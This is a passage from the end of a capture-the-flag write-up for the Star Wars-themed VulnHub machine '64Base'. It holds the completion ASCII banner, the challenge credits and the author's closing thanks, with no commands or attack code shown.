 black screen  (except for some faces)  with a not too fancy font. Contribu-
 tions welcome, email to the adress below. Sources LS: The Star Wars Source-
 book,  Star Wars Imperial Sourcebook,  The Star Wars Rebel Alliance Source-
 book, Star Wars: The Roleplaying Game (2nd Ed) all by West End Games, Inc.

____________________________________________________________________________

  ______  ______  ______  ______  ______  ______  ______  ______  
 |______||______||______||______||______||______||______||______||______| 
  _   _   ____ __          __ __     __ ____   _    _  _  _____   ______  
 | \ | | / __ \\ \        / / \ \   / // __ \ | |  | |( )|  __ \ |  ____| 
 |  \| || |  | |\ \  /\  / /   \ \_/ /| |  | || |  | ||/ | |__) || |__    
 | . ` || |  | | \ \/  \/ /     \   / | |  | || |  | |   |  _  / |  __|   
 | |\  || |__| |  \  /\  /       | |  | |__| || |__| |   | | \ \ | |____  
 |_| \_| \____/    \/  \/        |_|   \____/  \____/    |_|  \_\|______| 
                                _  ______  _____  _____  _                
             /\                | ||  ____||  __ \|_   _|| |               
            /  \               | || |__   | |  | | | |  | |               
           / /\ \          _   | ||  __|  | |  | | | |  | |               
          / ____ \        | |__| || |____ | |__| |_| |_ |_|               
         /_/    \_\        \____/ |______||_____/|_____|(_)               
  ______  ______  ______  ______  ______  ______  ______  ______  ______  
 |______||______||______||______||______||______||______||______||______| 
                                                                          

                    I hope you enjoyed this challenge
                    Please leave comments & feedback
                    @ https://www.vulnhub.com/?q=64base
                    -----------------------------------
                    64Base Challenge by 3mrgnc3
                    @ https://3mrgnc3.ninja   
                    -----------------------------------


Holy cow! This was an awesome VM to work with. There were a ton of tools and tricks that I either hadn't used in forever or was able to learn. I really loved the Star Wars theme and the ASCII art. This VM had plenty of rabbit holes to get lost in but had the perfect amount of *hints* to help keep you on track.

I'd like to thank @3mrgnc3 for creating such a fun VM and of course g0tmi1k and vulnhub for hosting these wonderful images. Also, I'd like to thank some of my buddies who worked on this with me.

Until next time!

geoda